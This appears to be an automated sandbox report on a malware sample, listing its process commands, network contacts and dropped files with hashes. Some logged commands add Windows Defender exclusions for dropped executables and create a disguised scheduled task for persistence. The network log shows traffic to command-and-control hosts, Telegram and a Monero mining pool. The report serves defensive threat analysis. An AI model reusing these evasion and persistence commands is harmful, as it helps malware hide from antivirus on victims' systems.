"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3cpcjorb\3cpcjorb.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES198B.tmp" "c:\Users\Admin\AppData\Local\Temp\3cpcjorb\CSCBCEC958DCFB740CF86BBF5429A6D15CB.TMP"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5300 -ip 5300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 7428 -ip 7428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 1288

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\GJgncWe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GJgncWe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp21E7.tmp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

Network

US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
DE 101.99.92.189:8080 tcp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 7.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.123.95.227:443 steamcommunity.com tcp
US 8.8.8.8:53 189.92.99.101.in-addr.arpa udp
US 8.8.8.8:53 227.95.123.104.in-addr.arpa udp
US 8.8.8.8:53 sanboxland.pro udp
GB 89.35.131.209:80 sanboxland.pro tcp
US 8.8.8.8:53 209.131.35.89.in-addr.arpa udp
US 8.8.8.8:53 a1060630.xsph.ru udp
RU 141.8.192.138:80 a1060630.xsph.ru tcp
US 8.8.8.8:53 138.192.8.141.in-addr.arpa udp
FR 142.250.75.238:443 drive.google.com tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 f0706909.xsph.ru udp
RU 141.8.193.236:80 f0706909.xsph.ru tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:80 ipwho.is tcp
US 8.8.8.8:53 236.193.8.141.in-addr.arpa udp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:50754 tcp
N/A 127.0.0.1:50936 tcp
DE 84.118.224.155:9001 tcp
LT 213.252.245.153:8080 tcp
US 8.8.8.8:53 153.245.252.213.in-addr.arpa udp
DE 188.68.50.76:9001 tcp
FI 95.217.112.243:443 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 76.50.68.188.in-addr.arpa udp
US 8.8.8.8:53 243.112.217.95.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
GB 51.195.138.197:10343 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 197.138.195.51.in-addr.arpa udp
DE 195.201.57.90:80 ipwho.is tcp
US 8.8.8.8:53 a1059592.xsph.ru udp
RU 141.8.192.138:80 a1059592.xsph.ru tcp
US 8.8.8.8:53 f1043947.xsph.ru udp
RU 141.8.192.151:80 f1043947.xsph.ru tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 151.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 freegeoip.app udp
US 104.21.73.97:443 freegeoip.app tcp
US 8.8.8.8:53 a1051707.xsph.ru udp
RU 141.8.192.217:80 a1051707.xsph.ru tcp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 ipbase.com udp
FR 142.250.75.227:443 gstatic.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 97.73.21.104.in-addr.arpa udp
US 8.8.8.8:53 217.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 227.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 172.67.209.71:443 ipbase.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 154.216.17.90:80 tcp
RU 176.113.115.19:80 176.113.115.19 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.speak-a-message.com udp
DE 195.201.119.163:80 www.speak-a-message.com tcp
US 8.8.8.8:53 19.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 163.119.201.195.in-addr.arpa udp
US 8.8.8.8:53 awake-weaves.cyou udp
US 172.67.143.116:443 awake-weaves.cyou tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 immureprech.biz udp
US 172.67.207.38:443 immureprech.biz tcp
US 8.8.8.8:53 116.143.67.172.in-addr.arpa udp
US 8.8.8.8:53 38.207.67.172.in-addr.arpa udp
US 8.8.8.8:53 deafeninggeh.biz udp
US 104.21.32.1:443 deafeninggeh.biz tcp
US 8.8.8.8:53 effecterectz.xyz udp
US 8.8.8.8:53 diffuculttan.xyz udp
US 8.8.8.8:53 debonairnukk.xyz udp
US 8.8.8.8:53 wrathful-jammy.cyou udp
US 104.21.74.196:443 wrathful-jammy.cyou tcp
US 8.8.8.8:53 jrqh-hk.com udp
US 8.8.8.8:53 id71.internetid.ru udp
US 8.8.8.8:53 1.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 196.74.21.104.in-addr.arpa udp
CN 123.136.92.99:80 jrqh-hk.com tcp
RU 95.213.205.83:5655 id71.internetid.ru tcp
US 8.8.8.8:53 sordid-snaked.cyou udp
US 104.21.27.63:443 sordid-snaked.cyou tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 83.205.213.95.in-addr.arpa udp
US 8.8.8.8:53 99.92.136.123.in-addr.arpa udp
US 8.8.8.8:53 63.27.21.104.in-addr.arpa udp
GB 104.124.170.33:443 steamcommunity.com tcp
RU 109.234.156.179:5655 tcp
US 8.8.8.8:53 179.156.234.109.in-addr.arpa udp
US 8.8.8.8:53 33.170.124.104.in-addr.arpa udp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 ship-amongst.gl.at.ply.gg udp
US 147.185.221.24:14429 ship-amongst.gl.at.ply.gg tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 24.221.185.147.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 154.216.17.90:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 testinghigger-42471.portmap.host udp
DE 193.161.193.99:42471 testinghigger-42471.portmap.host tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
N/A 192.168.56.1:4782 tcp
US 8.8.8.8:53 updates.signiant.com udp
DE 13.32.121.48:80 updates.signiant.com tcp
US 8.8.8.8:53 48.121.32.13.in-addr.arpa udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 193.161.193.99:42471 testinghigger-42471.portmap.host tcp
US 8.8.8.8:53 www.hootech.com udp
US 107.191.125.184:80 www.hootech.com tcp
US 8.8.8.8:53 184.125.191.107.in-addr.arpa udp
US 8.8.8.8:53 portals.mediashuttle.com udp
US 13.248.156.178:443 portals.mediashuttle.com tcp
US 8.8.8.8:53 178.156.248.13.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
RU 31.41.244.10:80 31.41.244.10 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 20.83.148.22:80 tcp
N/A 192.168.56.1:4782 tcp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 webcdn.triongames.com udp
GB 2.18.190.83:80 webcdn.triongames.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 8.8.8.8:53 83.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 147.68.81.185.in-addr.arpa udp
DE 87.120.84.32:80 87.120.84.32 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.81.68.147:1912 tcp
US 8.8.8.8:53 32.84.120.87.in-addr.arpa udp
BG 195.230.23.72:8085 195.230.23.72 tcp
US 8.8.8.8:53 get.geojs.io udp
US 104.26.1.100:443 get.geojs.io tcp
US 8.8.8.8:53 72.23.230.195.in-addr.arpa udp
US 8.8.8.8:53 100.1.26.104.in-addr.arpa udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 94.156.177.133:7000 tcp
US 8.8.8.8:53 133.177.156.94.in-addr.arpa udp
US 8.8.8.8:53 boot-01.net.anydesk.com udp
DE 195.181.174.173:443 boot-01.net.anydesk.com tcp
US 8.8.8.8:53 relay-d4aa0625.net.anydesk.com udp
GB 57.128.141.164:80 relay-d4aa0625.net.anydesk.com tcp
US 8.8.8.8:53 173.174.181.195.in-addr.arpa udp
US 8.8.8.8:53 164.141.128.57.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 192.168.56.1:4782 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
US 154.216.17.90:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 boot.net.anydesk.com udp
DE 57.129.19.1:443 boot.net.anydesk.com tcp
DE 57.129.19.1:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 relay-d4aa0625.net.anydesk.com udp
GB 57.128.141.164:443 relay-d4aa0625.net.anydesk.com tcp
US 8.8.8.8:53 1.19.129.57.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 18.102.255.239.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
TH 165.154.184.75:80 165.154.184.75 tcp
US 8.8.8.8:53 api.playanext.com udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
DE 18.245.86.105:80 api.playanext.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 105.86.245.18.in-addr.arpa udp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 192.168.56.1:4782 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
FR 142.250.75.227:443 gstatic.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
HK 47.244.167.171:801 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 171.167.244.47.in-addr.arpa udp
US 192.210.150.26:3678 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:3678 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
GB 89.35.131.209:80 sanboxland.pro tcp
US 192.210.150.26:3678 tcp
DE 18.245.86.105:80 api.playanext.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 192.168.56.1:4782 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 192.210.150.26:3678 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
BG 195.230.23.72:80 tcp
US 192.210.150.26:3678 tcp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 0.130.122.193.in-addr.arpa udp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 134.177.67.172.in-addr.arpa udp
US 192.210.150.26:3678 tcp

Files

memory/3128-0-0x00007FFB99D13000-0x00007FFB99D15000-memory.dmp

memory/3128-1-0x00000000000C0000-0x00000000000C8000-memory.dmp

memory/3128-2-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

memory/3128-3-0x00007FFB99D13000-0x00007FFB99D15000-memory.dmp

memory/3128-4-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\random.exe

MD5 3a425626cbd40345f5b8dddd6b2b9efa
SHA1 7b50e108e293e54c15dce816552356f424eea97a
SHA256 ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1
SHA512 a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

C:\Users\Admin\AppData\Local\Temp\a\u1w30Wt.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

C:\Users\Admin\AppData\Local\Temp\a\client.exe

MD5 52a3c7712a84a0f17e9602828bf2e86d
SHA1 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2
SHA256 afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288
SHA512 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac

memory/4828-36-0x0000015588F50000-0x0000015588F68000-memory.dmp

memory/4828-37-0x00000155A3560000-0x00000155A3722000-memory.dmp

memory/4828-38-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

memory/4828-39-0x00000155A3D60000-0x00000155A4288000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 3626532127e3066df98e34c3d56a1869
SHA1 5fa7102f02615afde4efd4ed091744e842c63f78
SHA256 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca
SHA512 dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 045b0a3d5be6f10ddf19ae6d92dfdd70
SHA1 0387715b6681d7097d372cd0005b664f76c933c7
SHA256 94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d
SHA512 58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

MD5 cea368fc334a9aec1ecff4b15612e5b0
SHA1 493d23f72731bb570d904014ffdacbba2334ce26
SHA256 07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541
SHA512 bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 0dc4014facf82aa027904c1be1d403c1
SHA1 5e6d6c020bfc2e6f24f3d237946b0103fe9b1831
SHA256 a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7
SHA512 cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

MD5 d68f79c459ee4ae03b76fa5ba151a41f
SHA1 bfa641085d59d58993ba98ac9ee376f898ee5f7b
SHA256 aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6
SHA512 bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 b7d1e04629bec112923446fda5391731
SHA1 814055286f963ddaa5bf3019821cb8a565b56cb8
SHA256 4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789
SHA512 79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 7187cc2643affab4ca29d92251c96dee
SHA1 ab0a4de90a14551834e12bb2c8c6b9ee517acaf4
SHA256 c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830
SHA512 27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 5659eba6a774f9d5322f249ad989114a
SHA1 4bfb12aa98a1dc2206baa0ac611877b815810e4c
SHA256 e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4
SHA512 f93abf2787b1e06ce999a0cbc67dc787b791a58f9ce20af5587b2060d663f26be9f648d116d9ca279af39299ea5d38e3c86271297e47c1438102ca28fce8edc4

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 579a63bebccbacab8f14132f9fc31b89
SHA1 fca8a51077d352741a9c1ff8a493064ef5052f27
SHA256 0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0
SHA512 4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f

memory/1364-115-0x00007FF6E3450000-0x00007FF6E38E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe

MD5 63c4e3f9c7383d039ab4af449372c17f
SHA1 f52ff760a098a006c41269ff73abb633b811f18e
SHA256 151524f6c1d1aeac530cfd69de15c3336043dc8eb3f5aeaa31513e24bfd7acdd
SHA512 dcfb4804c5569ad13e752270d13320f8769601b7092544741e35bc62a22af363b7a5ea7c5a65132c9575540a3e689a6946110502bd0f046385b8739e81761fbf

C:\Users\Admin\AppData\Local\Temp\main\in.exe

MD5 83d75087c9bf6e4f07c36e550731ccde
SHA1 d5ff596961cce5f03f842cfd8f27dde6f124e3ae
SHA256 46db3164bebffc61c201fe1e086bffe129ddfed575e6d839ddb4f9622963fb3f
SHA512 044e1f5507e92715ce9df8bb802e83157237a2f96f39bac3b6a444175f1160c4d82f41a0bcecf5feaf1c919272ed7929baef929a8c3f07deecebc44b0435164a

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 5404286ec7853897b3ba00adf824d6c1
SHA1 39e543e08b34311b82f6e909e1e67e2f4afec551
SHA256 ec94a6666a3103ba6be60b92e843075a2d7fe7d30fa41099c3f3b1e2a5eba266
SHA512 c4b78298c42148d393feea6c3941c48def7c92ef0e6baac99144b083937d0a80d3c15bd9a0bf40daa60919968b120d62999fa61af320e507f7e99fbfe9b9ef30

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 5eb39ba3698c99891a6b6eb036cfb653
SHA1 d2f1cdd59669f006a2f1aa9214aeed48bc88c06e
SHA256 e77f5e03ae140dda27d73e1ffe43f7911e006a108cf51cbd0e05d73aa92da7c2
SHA512 6c4ca20e88d49256ed9cabec0d1f2b00dfcf3d1603b5c95d158d4438c9f1e58495f8dfa200dbe7f49b5b0dd57886517eb3b98c4190484548720dad4b3db6069e

C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

memory/1364-133-0x00007FF6E3450000-0x00007FF6E38E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\vcruntime140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\select.pyd

MD5 7c14c7bc02e47d5c8158383cb7e14124
SHA1 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3
SHA256 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5
SHA512 af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\_socket.pyd

MD5 69801d1a0809c52db984602ca2653541
SHA1 0f6e77086f049a7c12880829de051dcbe3d66764
SHA256 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3
SHA512 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0xweuwdr.jnn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4884-155-0x0000025D59AF0000-0x0000025D59B12000-memory.dmp

memory/4828-172-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe

MD5 12c766cab30c7a0ef110f0199beda18b
SHA1 efdc8eb63df5aae563c7153c3bd607812debeba4
SHA256 7b2070ca45ec370acba43623fb52931ee52bee6f0ce74e6230179b058fa2c316
SHA512 32cad9086d9c7a8d88c3bfcb0806f350f0df9624637439f1e34ab2efffa0c273faef0c226c388ed28f07381aef0655af9e3eb3e9557cbfd2d8c915b556b1cf10

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

MD5 258fbac30b692b9c6dc7037fc8d371f4
SHA1 ec2daa22663bd50b63316f1df0b24bdcf203f2d9
SHA256 1c1cc887675c501201f7074794a443c3eb56bcd3d25980e4ef65e9b69d44c427
SHA512 9a4a810cf5c9232762149e8ec4677da7d4a58835174e504614d7aea09926ab084b574dab85c060fa2306e3423112c29455806d6c32db86e401573eb3f24ce0e4

memory/860-194-0x0000000000F10000-0x0000000001180000-memory.dmp

memory/860-195-0x0000000005B40000-0x0000000005BDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

MD5 3567cb15156760b2f111512ffdbc1451
SHA1 2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
SHA512 e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba

C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe

MD5 2a78ce9f3872f5e591d643459cabe476
SHA1 9ac947dfc71a868bc9c2eb2bd78dfb433067682e
SHA256 21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae
SHA512 03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

memory/3852-232-0x0000000000400000-0x00000000007BD000-memory.dmp

C:\Program Files\Windows Media Player\graph\graph.exe

